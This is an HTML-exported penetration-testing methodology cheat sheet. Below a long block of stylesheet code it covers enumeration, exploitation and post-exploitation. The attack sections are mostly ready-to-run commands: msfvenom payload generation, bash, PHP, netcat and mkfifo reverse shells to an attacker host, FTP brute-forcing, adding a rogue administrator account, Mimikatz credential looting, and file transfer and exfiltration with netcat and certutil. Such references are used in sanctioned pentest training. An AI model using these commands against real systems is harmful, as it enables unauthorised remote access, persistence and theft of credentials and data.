<!DOCTYPE html><html><head>
      <title>methodology</title>
      <meta charset="utf-8">
      <meta name="viewport" content="width=device-width, initial-scale=1.0">
      
      <link rel="stylesheet" href="file:////home/neuieugh/.vscode/extensions/shd101wyy.markdown-preview-enhanced-0.5.3/node_modules/@shd101wyy/mume/dependencies/katex/katex.min.css">
      
      

      
      
      
      
      
      
      

      <style>
      /**
 * prism.js Github theme based on GitHub's theme.
 * @author Sam Clarke
 */
code[class*="language-"],
pre[class*="language-"] {
  color: #333;
  background: none;
  font-family: Consolas, "Liberation Mono", Menlo, Courier, monospace;
  text-align: left;
  white-space: pre;
  word-spacing: normal;
  word-break: normal;
  word-wrap: normal;
  line-height: 1.4;

  -moz-tab-size: 8;
  -o-tab-size: 8;
  tab-size: 8;

  -webkit-hyphens: none;
  -moz-hyphens: none;
  -ms-hyphens: none;
  hyphens: none;
}

/* Code blocks */
pre[class*="language-"] {
  padding: .8em;
  overflow: auto;
  /* border: 1px solid #ddd; */
  border-radius: 3px;
  /* background: #fff; */
  background: #f5f5f5;
}

/* Inline code */
:not(pre) > code[class*="language-"] {
  padding: .1em;
  border-radius: .3em;
  white-space: normal;
  background: #f5f5f5;
}

.token.comment,
.token.blockquote {
  color: #969896;
}

.token.cdata {
  color: #183691;
}

.token.doctype,
.token.punctuation,
.token.variable,
.token.macro.property {
  color: #333;
}

.token.operator,
.token.important,
.token.keyword,
.token.rule,
.token.builtin {
  color: #a71d5d;
}

.token.string,
.token.url,
.token.regex,
.token.attr-value {
  color: #183691;
}

.token.property,
.token.number,
.token.boolean,
.token.entity,
.token.atrule,
.token.constant,
.token.symbol,
.token.command,
.token.code {
  color: #0086b3;
}

.token.tag,
.token.selector,
.token.prolog {
  color: #63a35c;
}

.token.function,
.token.namespace,
.token.pseudo-element,
.token.class,
.token.class-name,
.token.pseudo-class,
.token.id,
.token.url-reference .token.variable,
.token.attr-name {
  color: #795da3;
}

.token.entity {
  cursor: help;
}

.token.title,
.token.title .token.punctuation {
  font-weight: bold;
  color: #1d3e81;
}

.token.list {
  color: #ed6a43;
}

.token.inserted {
  background-color: #eaffea;
  color: #55a532;
}

.token.deleted {
  background-color: #ffecec;
  color: #bd2c00;
}

.token.bold {
  font-weight: bold;
}

.token.italic {
  font-style: italic;
}


/* JSON */
.language-json .token.property {
  color: #183691;
}

.language-markup .token.tag .token.punctuation {
  color: #333;
}

/* CSS */
code.language-css,
.language-css .token.function {
  color: #0086b3;
}

/* YAML */
.language-yaml .token.atrule {
  color: #63a35c;
}

code.language-yaml {
  color: #183691;
}

/* Ruby */
.language-ruby .token.function {
  color: #333;
}

/* Markdown */
.language-markdown .token.url {
  color: #795da3;
}

/* Makefile */
.language-makefile .token.symbol {
  color: #795da3;
}

.language-makefile .token.variable {
  color: #183691;
}

.language-makefile .token.builtin {
  color: #0086b3;
}

/* Bash */
.language-bash .token.keyword {
  color: #0086b3;
}

/* highlight */
pre[data-line] {
  position: relative;
  padding: 1em 0 1em 3em;
}
pre[data-line] .line-highlight-wrapper {
  position: absolute;
  top: 0;
  left: 0;
  background-color: transparent;
  display: block;
  width: 100%;
}

pre[data-line] .line-highlight {
  position: absolute;
  left: 0;
  right: 0;
  padding: inherit 0;
  margin-top: 1em;
  background: hsla(24, 20%, 50%,.08);
  background: linear-gradient(to right, hsla(24, 20%, 50%,.1) 70%, hsla(24, 20%, 50%,0));
  pointer-events: none;
  line-height: inherit;
  white-space: pre;
}

pre[data-line] .line-highlight:before, 
pre[data-line] .line-highlight[data-end]:after {
  content: attr(data-start);
  position: absolute;
  top: .4em;
  left: .6em;
  min-width: 1em;
  padding: 0 .5em;
  background-color: hsla(24, 20%, 50%,.4);
  color: hsl(24, 20%, 95%);
  font: bold 65%/1.5 sans-serif;
  text-align: center;
  vertical-align: .3em;
  border-radius: 999px;
  text-shadow: none;
  box-shadow: 0 1px white;
}

pre[data-line] .line-highlight[data-end]:after {
  content: attr(data-end);
  top: auto;
  bottom: .4em;
}html body{font-family:"Helvetica Neue",Helvetica,"Segoe UI",Arial,freesans,sans-serif;font-size:16px;line-height:1.6;color:#333;background-color:#fff;overflow:initial;box-sizing:border-box;word-wrap:break-word}html body>:first-child{margin-top:0}html body h1,html body h2,html body h3,html body h4,html body h5,html body h6{line-height:1.2;margin-top:1em;margin-bottom:16px;color:#000}html body h1{font-size:2.25em;font-weight:300;padding-bottom:.3em}html body h2{font-size:1.75em;font-weight:400;padding-bottom:.3em}html body h3{font-size:1.5em;font-weight:500}html body h4{font-size:1.25em;font-weight:600}html body h5{font-size:1.1em;font-weight:600}html body h6{font-size:1em;font-weight:600}html body h1,html body h2,html body h3,html body h4,html body h5{font-weight:600}html body h5{font-size:1em}html body h6{color:#5c5c5c}html body strong{color:#000}html body del{color:#5c5c5c}html body a:not([href]){color:inherit;text-decoration:none}html body a{color:#08c;text-decoration:none}html body a:hover{color:#00a3f5;text-decoration:none}html body img{max-width:100%}html body>p{margin-top:0;margin-bottom:16px;word-wrap:break-word}html body>ul,html body>ol{margin-bottom:16px}html body ul,html body ol{padding-left:2em}html body ul.no-list,html body ol.no-list{padding:0;list-style-type:none}html body ul ul,html body ul ol,html body ol ol,html body ol ul{margin-top:0;margin-bottom:0}html body li{margin-bottom:0}html body li.task-list-item{list-style:none}html body li>p{margin-top:0;margin-bottom:0}html body .task-list-item-checkbox{margin:0 .2em .25em -1.8em;vertical-align:middle}html body .task-list-item-checkbox:hover{cursor:pointer}html body blockquote{margin:16px 0;font-size:inherit;padding:0 15px;color:#5c5c5c;border-left:4px solid #d6d6d6}html body blockquote>:first-child{margin-top:0}html body blockquote>:last-child{margin-bottom:0}html body hr{height:4px;margin:32px 0;background-color:#d6d6d6;border:0 none}html body table{margin:10px 0 15px 0;border-collapse:collapse;border-spacing:0;display:block;width:100%;overflow:auto;word-break:normal;word-break:keep-all}html body table th{font-weight:bold;color:#000}html body table td,html body table th{border:1px solid #d6d6d6;padding:6px 13px}html body dl{padding:0}html body dl dt{padding:0;margin-top:16px;font-size:1em;font-style:italic;font-weight:bold}html body dl dd{padding:0 16px;margin-bottom:16px}html body code{font-family:Menlo,Monaco,Consolas,'Courier New',monospace;font-size:.85em !important;color:#000;background-color:#f0f0f0;border-radius:3px;padding:.2em 0}html body code::before,html body code::after{letter-spacing:-0.2em;content:"\00a0"}html body pre>code{padding:0;margin:0;font-size:.85em !important;word-break:normal;white-space:pre;background:transparent;border:0}html body .highlight{margin-bottom:16px}html body .highlight pre,html body pre{padding:1em;overflow:auto;font-size:.85em !important;line-height:1.45;border:#d6d6d6;border-radius:3px}html body .highlight pre{margin-bottom:0;word-break:normal}html body pre code,html body pre tt{display:inline;max-width:initial;padding:0;margin:0;overflow:initial;line-height:inherit;word-wrap:normal;background-color:transparent;border:0}html body pre code:before,html body pre tt:before,html body pre code:after,html body pre tt:after{content:normal}html body p,html body blockquote,html body ul,html body ol,html body dl,html body pre{margin-top:0;margin-bottom:16px}html body kbd{color:#000;border:1px solid #d6d6d6;border-bottom:2px solid #c7c7c7;padding:2px 4px;background-color:#f0f0f0;border-radius:3px}@media print{html body{background-color:#fff}html body h1,html body h2,html body h3,html body h4,html body h5,html body h6{color:#000;page-break-after:avoid}html body blockquote{color:#5c5c5c}html body pre{page-break-inside:avoid}html body table{display:table}html body img{display:block;max-width:100%;max-height:100%}html body pre,html body code{word-wrap:break-word;white-space:pre}}.markdown-preview{width:100%;height:100%;box-sizing:border-box}.markdown-preview .pagebreak,.markdown-preview .newpage{page-break-before:always}.markdown-preview pre.line-numbers{position:relative;padding-left:3.8em;counter-reset:linenumber}.markdown-preview pre.line-numbers>code{position:relative}.markdown-preview pre.line-numbers .line-numbers-rows{position:absolute;pointer-events:none;top:1em;font-size:100%;left:0;width:3em;letter-spacing:-1px;border-right:1px solid #999;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none}.markdown-preview pre.line-numbers .line-numbers-rows>span{pointer-events:none;display:block;counter-increment:linenumber}.markdown-preview pre.line-numbers .line-numbers-rows>span:before{content:counter(linenumber);color:#999;display:block;padding-right:.8em;text-align:right}.markdown-preview .mathjax-exps .MathJax_Display{text-align:center !important}.markdown-preview:not([for="preview"]) .code-chunk .btn-group{display:none}.markdown-preview:not([for="preview"]) .code-chunk .status{display:none}.markdown-preview:not([for="preview"]) .code-chunk .output-div{margin-bottom:16px}.scrollbar-style::-webkit-scrollbar{width:8px}.scrollbar-style::-webkit-scrollbar-track{border-radius:10px;background-color:transparent}.scrollbar-style::-webkit-scrollbar-thumb{border-radius:5px;background-color:rgba(150,150,150,0.66);border:4px solid rgba(150,150,150,0.66);background-clip:content-box}html body[for="html-export"]:not([data-presentation-mode]){position:relative;width:100%;height:100%;top:0;left:0;margin:0;padding:0;overflow:auto}html body[for="html-export"]:not([data-presentation-mode]) .markdown-preview{position:relative;top:0}@media screen and (min-width:914px){html body[for="html-export"]:not([data-presentation-mode]) .markdown-preview{padding:2em calc(50% - 457px + 2em)}}@media screen and (max-width:914px){html body[for="html-export"]:not([data-presentation-mode]) .markdown-preview{padding:2em}}@media screen and (max-width:450px){html body[for="html-export"]:not([data-presentation-mode]) .markdown-preview{font-size:14px !important;padding:1em}}@media print{html body[for="html-export"]:not([data-presentation-mode]) #sidebar-toc-btn{display:none}}html body[for="html-export"]:not([data-presentation-mode]) #sidebar-toc-btn{position:fixed;bottom:8px;left:8px;font-size:28px;cursor:pointer;color:inherit;z-index:99;width:32px;text-align:center;opacity:.4}html body[for="html-export"]:not([data-presentation-mode])[html-show-sidebar-toc] #sidebar-toc-btn{opacity:1}html body[for="html-export"]:not([data-presentation-mode])[html-show-sidebar-toc] .md-sidebar-toc{position:fixed;top:0;left:0;width:300px;height:100%;padding:32px 0 48px 0;font-size:14px;box-shadow:0 0 4px rgba(150,150,150,0.33);box-sizing:border-box;overflow:auto;background-color:inherit}html body[for="html-export"]:not([data-presentation-mode])[html-show-sidebar-toc] .md-sidebar-toc::-webkit-scrollbar{width:8px}html body[for="html-export"]:not([data-presentation-mode])[html-show-sidebar-toc] .md-sidebar-toc::-webkit-scrollbar-track{border-radius:10px;background-color:transparent}html body[for="html-export"]:not([data-presentation-mode])[html-show-sidebar-toc] .md-sidebar-toc::-webkit-scrollbar-thumb{border-radius:5px;background-color:rgba(150,150,150,0.66);border:4px solid rgba(150,150,150,0.66);background-clip:content-box}html body[for="html-export"]:not([data-presentation-mode])[html-show-sidebar-toc] .md-sidebar-toc a{text-decoration:none}html body[for="html-export"]:not([data-presentation-mode])[html-show-sidebar-toc] .md-sidebar-toc ul{padding:0 1.6em;margin-top:.8em}html body[for="html-export"]:not([data-presentation-mode])[html-show-sidebar-toc] .md-sidebar-toc li{margin-bottom:.8em}html body[for="html-export"]:not([data-presentation-mode])[html-show-sidebar-toc] .md-sidebar-toc ul{list-style-type:none}html body[for="html-export"]:not([data-presentation-mode])[html-show-sidebar-toc] .markdown-preview{left:300px;width:calc(100% -  300px);padding:2em calc(50% - 457px -  150px);margin:0;box-sizing:border-box}@media screen and (max-width:1274px){html body[for="html-export"]:not([data-presentation-mode])[html-show-sidebar-toc] .markdown-preview{padding:2em}}@media screen and (max-width:450px){html body[for="html-export"]:not([data-presentation-mode])[html-show-sidebar-toc] .markdown-preview{width:100%}}html body[for="html-export"]:not([data-presentation-mode]):not([html-show-sidebar-toc]) .markdown-preview{left:50%;transform:translateX(-50%)}html body[for="html-export"]:not([data-presentation-mode]):not([html-show-sidebar-toc]) .md-sidebar-toc{display:none}
/* Please visit the URL below for more information: */
/*   https://shd101wyy.github.io/markdown-preview-enhanced/#/customize-css */

      </style>
    </head>
    <body for="html-export">
      <div class="mume markdown-preview  ">
      <h1 class="mume-header" id="1-enumeration">1. Enumeration</h1>

<h2 class="mume-header" id="intital-scanning">Intital Scanning</h2>

<p>First run an asynchronous port scan on the box to find the ports of interest.</p>
<pre data-role="codeBlock" data-info="bash" class="language-bash"><span class="token comment"># Standard</span>
unicornscan <span class="token variable">$RHOST</span>

<span class="token comment"># Full Range</span>
unicornscan <span class="token variable">$RHOST</span>:0-65535
</pre><p>Second, run a slower, synchronous scans with scripts.</p>
<h2 class="mume-header" id="port-21-ftp">Port 21 - FTP</h2>

<pre data-role="codeBlock" data-info="bash" class="language-bash"><span class="token comment"># Anonymous login</span>
nmap --script<span class="token operator">=</span>ftp-anon -p 21 <span class="token variable">$RHOST</span>

<span class="token comment"># Bruteforce logins</span>
nmap --script<span class="token operator">=</span>ftp-brute -p 21 <span class="token variable">$RHOST</span>
</pre><h2 class="mume-header" id="port-80-http">Port 80 - HTTP</h2>

<pre data-role="codeBlock" data-info="bash" class="language-bash">nikto <span class="token variable">$RHOST</span>

<span class="token function">curl</span> <span class="token variable">$RHOST</span>/robots.txt

dirbuster
</pre><h4 class="mume-header" id="wordpress">Wordpress</h4>

<pre data-role="codeBlock" data-info="bash" class="language-bash">nmap --script<span class="token operator">=</span>http-wordpress* -p 80 <span class="token variable">$RHOST</span>

wpscan <span class="token variable">$RHOST</span>
</pre><h2 class="mume-header" id="port-139445-smb">Port 139/445 - SMB</h2>

<pre data-role="codeBlock" data-info="bash" class="language-bash">enum4linux <span class="token punctuation">[</span>-u username<span class="token punctuation">]</span><span class="token punctuation">[</span>-p password<span class="token punctuation">]</span> <span class="token variable">$RHOST</span>

smbmap <span class="token punctuation">[</span>-u username<span class="token punctuation">]</span><span class="token punctuation">[</span>-p password<span class="token punctuation">]</span> <span class="token variable">$RHOST</span>

<span class="token comment"># Info dump</span>
nmap --script<span class="token operator">=</span>smb-enum*.nse -p 139,445 <span class="token variable">$RHOST</span>

<span class="token comment"># OS discovery</span>
nmap --script<span class="token operator">=</span>smb-os-discovery.nse -p 139,445 <span class="token variable">$RHOST</span>

<span class="token comment"># Scan for known vulnerabilties</span>
nmap --script<span class="token operator">=</span>smb-vuln* -p 139,445 <span class="token variable">$RHOST</span>
</pre><h1 class="mume-header" id="2-exploitation">2. Exploitation</h1>

<h2 class="mume-header" id="msfvenom-reverse-shell-payloads">MSFVenom Reverse Shell Payloads</h2>

<h3 class="mume-header" id="generate-payloads">Generate Payloads</h3>

<pre data-role="codeBlock" data-info="bash" class="language-bash">msfvenom -p <span class="token variable">$PAYLOAD</span> LHOST<span class="token operator">=</span><span class="token variable">$LHOST</span> LPORT<span class="token operator">=</span><span class="token variable">$LPORT</span> <span class="token punctuation">[</span>-e <span class="token variable">$ENCODER</span> <span class="token punctuation">[</span>-i <span class="token variable">$ROUNDS</span><span class="token punctuation">]</span><span class="token punctuation">]</span> <span class="token punctuation">[</span>-b <span class="token variable">$BADCHARS</span><span class="token punctuation">]</span> <span class="token punctuation">[</span>-f <span class="token variable">$FORMAT</span><span class="token punctuation">]</span> <span class="token punctuation">[</span>-o <span class="token variable">$FILENMAE</span><span class="token punctuation">]</span>
</pre><h3 class="mume-header" id="payloads">Payloads</h3>

<table>
<thead>
<tr>
<th style="text-align:left">Windows</th>
<th style="text-align:right"></th>
</tr>
</thead>
<tbody>
<tr>
<td style="text-align:left">Staged</td>
<td style="text-align:right"><code>windows/shell/reverse_tcp</code></td>
</tr>
<tr>
<td style="text-align:left">Stageless</td>
<td style="text-align:right"><code>windows/shell_reverse_tcp</code></td>
</tr>
</tbody>
</table>
<table>
<thead>
<tr>
<th style="text-align:left">Linux</th>
<th style="text-align:right"></th>
</tr>
</thead>
<tbody>
<tr>
<td style="text-align:left">32bit</td>
<td style="text-align:right"><code>linux/x86/shell_reverse_tcp</code></td>
</tr>
<tr>
<td style="text-align:left">64bit</td>
<td style="text-align:right"><code>linux/x64/shell_reverse_tcp</code></td>
</tr>
</tbody>
</table>
<h4 class="mume-header" id="encoders">Encoders</h4>

<p><code>x86/shikata_ga_nai</code></p>
<h2 class="mume-header" id="bash-reverse-shells">Bash Reverse Shells</h2>

<pre data-role="codeBlock" data-info="bash" class="language-bash">0<span class="token operator">&lt;</span><span class="token operator">&amp;</span>196<span class="token punctuation">;</span><span class="token function">exec</span> 196<span class="token operator">&lt;</span><span class="token operator">&gt;</span>/dev/tcp/<span class="token variable">$LHOST</span>/<span class="token variable">$LPORT</span><span class="token punctuation">;</span> sh <span class="token operator">&lt;</span><span class="token operator">&amp;</span>196 <span class="token operator">&gt;</span><span class="token operator">&amp;</span>196 2<span class="token operator">&gt;</span><span class="token operator">&amp;</span>196
</pre><pre data-role="codeBlock" data-info="bash" class="language-bash"><span class="token function">bash</span> -i <span class="token operator">&gt;</span><span class="token operator">&amp;</span> /dev/tcp/<span class="token variable">$LHOST</span>/<span class="token variable">$LPORT</span> 0<span class="token operator">&gt;</span><span class="token operator">&amp;</span>1
</pre><h2 class="mume-header" id="php-reverse-shells">PHP Reverse Shells</h2>

<h3 class="mume-header" id="one-liner">One Liner</h3>

<pre data-role="codeBlock" data-info="php" class="language-php"><span class="token delimiter important">&lt;?php</span> <span class="token variable">$sock</span> <span class="token operator">=</span> <span class="token function">fsockopen</span><span class="token punctuation">(</span><span class="token variable">$LHOST</span><span class="token punctuation">,</span><span class="token variable">$LPORT</span><span class="token punctuation">)</span><span class="token punctuation">;</span> <span class="token variable">$proc</span> <span class="token operator">=</span> <span class="token function">proc_open</span><span class="token punctuation">(</span><span class="token double-quoted-string string">&quot;/bin/sh -i&quot;</span><span class="token punctuation">,</span> <span class="token keyword">array</span><span class="token punctuation">(</span><span class="token number">0</span><span class="token operator">=</span><span class="token operator">&gt;</span><span class="token variable">$sock</span><span class="token punctuation">,</span> <span class="token number">1</span><span class="token operator">=</span><span class="token operator">&gt;</span><span class="token variable">$sock</span><span class="token punctuation">,</span> <span class="token number">2</span><span class="token operator">=</span><span class="token operator">&gt;</span><span class="token variable">$sock</span><span class="token punctuation">)</span><span class="token punctuation">,</span> <span class="token variable">$pipes</span><span class="token punctuation">)</span> <span class="token delimiter important">?&gt;</span>
</pre><h3 class="mume-header" id="file-upload">File Upload</h3>

<p>Kali File Location: <code>/usr/share/webshells/php/php-reverse-shell.php</code> <sup><sub>[<a href="files/php-reverse-shell.php">archive</a>]</sub></sup></p>
<h2 class="mume-header" id="netcat-reverse-shells">Netcat Reverse Shells</h2>

<h3 class="mume-header" id="unix">Unix</h3>

<pre data-role="codeBlock" data-info="bash" class="language-bash"><span class="token function">nc</span> -e /bin/sh <span class="token variable">$LHOST</span> <span class="token variable">$LPORT</span>
</pre><h3 class="mume-header" id="openbsd">OpenBSD</h3>

<pre data-role="codeBlock" data-info="bash" class="language-bash"><span class="token function">rm</span> /tmp/f<span class="token punctuation">;</span><span class="token function">mkfifo</span> /tmp/f<span class="token punctuation">;</span><span class="token function">cat</span> /tmp/f<span class="token operator">|</span>/bin/bash -i 2<span class="token operator">&gt;</span><span class="token operator">&amp;</span>1<span class="token operator">|</span><span class="token function">nc</span> <span class="token variable">$LHOST</span> <span class="token variable">$PORT</span> <span class="token operator">&gt;</span>/tmp/f
</pre><h1 class="mume-header" id="3-post-exploitation">3. Post-Exploitation</h1>

<h2 class="mume-header" id="linux">Linux</h2>

<h3 class="mume-header" id="enumeration-scripts">Enumeration Scripts:</h3>

<ul>
<li>
<p><a href="https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh">LinEnum.sh</a> <sup><sub>[<a href="files/LinEnum.sh">archive</a>]</sub></sup></p>
</li>
<li>
<p><a href="https://raw.githubusercontent.com/sleventyeleven/linuxprivchecker/master/linuxprivchecker.py">linuxprivchecker.py</a> <sup><sub>[<a href="files/linuxprivchecker.py">archive</a>]</sub></sup></p>
</li>
<li>
<p><a href="https://raw.githubusercontent.com/pentestmonkey/unix-privesc-check/master/upc.sh">unix-privesc-check.sh</a> <sup><sub>[<a href="files/upc.sh">archive</a>]</sub></sup></p>
</li>
</ul>
<h2 class="mume-header" id="windows">Windows</h2>

<h3 class="mume-header" id="enumeration-scripts-1">Enumeration Scripts</h3>

<ul>
<li>
<p><a href="https://raw.githubusercontent.com/AonCyberLabs/Windows-Exploit-Suggester/master/windows-exploit-suggester.py">windows-exploit-suggester.py</a>  <sup><sub>[<a href="files/windows-exploit-suggester.py">archive</a>]</sub></sup></p>
</li>
<li>
<p><a href="https://github.com/pentestmonkey/windows-privesc-check">windows-privesc-check</a> <sup><sub>[<a href="files/windows_privesc_check.py">archive</a>]</sub></sup></p>
</li>
<li>
<p><a href="https://github.com/rasta-mouse/Sherlock">Sherlock</a> <sup><sub>[<a href="files/Sherlock.ps1">archive</a>]</sub></sup></p>
</li>
</ul>
<h3 class="mume-header" id="resources">Resources</h3>

<ul>
<li><a href="https://guif.re/windowseop">https://guif.re/windowseop</a></li>
</ul>
<h3 class="mume-header" id="creating-admin-account">Creating Admin Account</h3>

<pre data-role="codeBlock" data-info="bash" class="language-bash"><span class="token comment"># Victim</span>
net user /add jack sparrow
net localgroup administrators jack /add

<span class="token comment"># Connect with</span>
rdesktop -u jim -p sparrow <span class="token punctuation">[</span>IP-ADDRESS<span class="token punctuation">]</span>
</pre><h3 class="mume-header" id="tokens">Tokens</h3>

<p>If you have admin, loot tokens &amp; creds with <a href="https://github.com/gentilkiwi/mimikatz">Mimikatz</a></p>
<p>If you have a service account, and want root - try token impersonation!</p>
<ul>
<li><a href="https://github.com/ohpe/juicy-potato">Juicy Potato</a></li>
<li><a href="https://github.com/Re4son/Churrasco">Churrasco</a></li>
</ul>
<h3 class="mume-header" id="using-python-scripts-without-python-installed">Using Python Scripts without Python installed</h3>

<p><a href="https://github.com/pyinstaller/pyinstaller">PyInstaller</a> <sup><sub>[<a href="files/PyInstaller-3.6.zip">archive</a>]</sub></sup></p>
<pre data-role="codeBlock" data-info="bash" class="language-bash">pyinstaller yourprogram.py
</pre><h2 class="mume-header" id="exfiltration">Exfiltration</h2>

<ul>
<li>SSH Copy (scp)</li>
</ul>
<pre data-role="codeBlock" data-info="bash" class="language-bash"><span class="token function">scp</span> user@hostname:/path/to/src user@hostname:/path/to/dst
</pre><ul>
<li>Netcat</li>
</ul>
<pre data-role="codeBlock" data-info="bash" class="language-bash"><span class="token comment"># Victim</span>
<span class="token function">nc</span> -nvlp <span class="token variable">$RPORT</span> <span class="token operator">&gt;</span> out.file

<span class="token comment"># Kali</span>
<span class="token function">nc</span> -nv <span class="token variable">$RHOST</span> <span class="token variable">$RPORT</span> <span class="token operator">&lt;</span> in.file
</pre><ul>
<li>exe2bat</li>
</ul>
<pre data-role="codeBlock" data-info="bash" class="language-bash"><span class="token comment"># Convert a windows executable to a copy and paste set of commands</span>
wine <span class="token variable"><span class="token variable">$(</span><span class="token function">locate</span> exe2bat.exe<span class="token variable">)</span></span> nc.exe nc.txt
</pre><ul>
<li>certutil.exe</li>
</ul>
<pre data-role="codeBlock" data-info="bash" class="language-bash">certutil.exe -urlcache -split -f &#x201C;<span class="token variable">$URL</span>&#x201D; <span class="token variable">$FILENAME</span>
</pre><ul>
<li><a href="files/zip.vbs">zip.vbs</a> <sup><sub>[<a href="files/zip.vbs.txt">copy&amp;paste</a>]</sub></sup></li>
</ul>
<pre data-role="codeBlock" data-info="bash" class="language-bash">CScript zip.vbs <span class="token variable">$SRC</span> <span class="token variable">$DEST</span>
</pre><ul>
<li><a href="files/wget.vbs">wget.vbs</a> <sup><sub>[<a href="files/wget.vbs.txt">copy&amp;paste</a>]</sub></sup></li>
</ul>
<pre data-role="codeBlock" data-info="bash" class="language-bash">CScript wget.vbs <span class="token variable">$SRC</span> <span class="token variable">$DEST</span>
</pre>
      </div>
      
      
    
    
    
    
    
    
    
    
  
    </body></html>